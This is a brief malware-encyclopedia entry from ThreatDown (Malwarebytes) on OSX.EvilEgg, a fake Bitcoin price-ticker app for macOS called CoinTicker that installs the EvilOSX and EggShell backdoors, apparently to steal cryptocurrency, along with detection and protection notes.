OSX.EvilEgg

ThreatDown is now the name of the Malwarebytes line of business products. References to Malwarebytes below reflect the amazing technology used to first identify the threat.

Short bio

OSX.EvilEgg is Malwarebytes’detection name for a macOs app named CoinTicker that installs two different backdoors.

Type of infection

When OSX.EvilEgg is launched, the app will download and install components of two different open-source backdoors: EvilOSX and EggShell.

Malicious behavior

The CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to someone who has invested in cryptocurrencies. The app puts an icon in the menu bar that gives information about the current price of Bitcoin.

Aftermath

It seems likely that OSX.EvilEgg is meant to be used to gain access to users cryptocurrency wallets, for the purpose of stealing coins.

Protection

Malwarebytes for Mac detects and removes OSX.EvilEgg.

Similiar detections

OSX.FrigidStealer OSX.Banshee OSX.Poseidon OSX.Pirrit OSX.AtomStealer OSX.Genieo OSX.MacStealer OSX.SmoothOperator OSX.MalProxy Ransom.OSX.EvilQuest View all OSX detections >

Products

Services

Platforms

Why ThreatDown

Detection Details

OSX.EvilEgg

Short bio

Type of infection

Malicious behavior

Aftermath

Protection

Similiar detections

Products & Services

Partners

Resources

Managed Services Terms & Conditions

Support

Get in Touch